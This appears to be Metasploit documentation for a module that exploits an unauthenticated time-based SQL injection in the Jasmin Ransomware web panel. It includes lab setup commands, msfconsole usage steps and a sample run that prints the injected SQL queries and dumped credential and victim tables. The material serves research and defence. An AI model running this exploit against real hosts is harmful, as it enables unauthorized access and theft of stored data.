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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/gather/
Views: 16117

Vulnerable Application

The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability within the login functionality. As of April 15, 2024 this was still unpatched, so all versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.

Retrieving the victim's data may take a long amount of time. It is much quicker to get the logins, then just login to the site.


create a LAMP server (using php 8.2 worked for me, 7.2 did not). Run the following commands:

git clone cd Jasmin-Ransomware sudo cp -r Web\ Panel/* /var/www/html/ sudo chown www-data:www-data /var/www/html/* sudo mysql -p

Execute the following SQL commands:

CREATE DATABASE jasmin_db; CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456'; GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost'; Exit

Now setup the database: sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use auxiliary/gather/jasmin_ransomware_sqli

  4. Do: set rhosts [IP]

  5. Do: run

  6. You should contents from the SQL Database.



Pull data from the Victim's table. Defaults to false


Number of rows from the victim table to pull. Defaults to nil which pulls all rows.


Jasmin installed on Ubuntu 22.04

msf6 > use auxiliary/gather/jasmin_ransomware_sqli msf6 auxiliary(gather/jasmin_ransomware_sqli) > set verbose true verbose => true msf6 auxiliary(gather/jasmin_ransomware_sqli) > set rhosts rhosts => msf6 auxiliary(gather/jasmin_ransomware_sqli) > set victims true victims => true msf6 auxiliary(gather/jasmin_ransomware_sqli) > run [*] Dumping login table [*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master) [*] {SQLi} Time-based injection: expecting output of length 15 [+] Dumped table contents: Logins ====== admin creds ----- ----- siddhant 123456 [*] Dumping victim table [*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(machine_name,''),ifnull(computer_user,''),ifnull(ip,''),ifnull(systemid,''),ifnull(password,'')) as binary)) from victims) [*] {SQLi} Time-based injection: expecting output of length 428 [+] Dumped table contents: Victims ======= machine_name computer_user ip systemid password ------------ ------------- -- -------- -------- Bollywood Salman Khan df545f454f5d4f5d4af5 M9M99EvNpZVOWpy9Q8sZLHEP DESKTOP-37Q74QH cyberstair 96457DF79A87C7C0008A7BE7 xAS4NinH/HQKNJwsNtTWN5yD FiFa Leone Messi cfhsfkdjkfvdd454s5g4 JDNAaz6e3oyM8cN+AGFdMl/5 Indian Cricket Virat Kohli SDGFs4F4S4FD4F4545fs 3tIHrYJqqTSBpw4lgMMck1GD White House Donald Trump fgighefesdgvrd5g45rd4h RJtCd9QqiCfBaSU0zQf84dvd [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed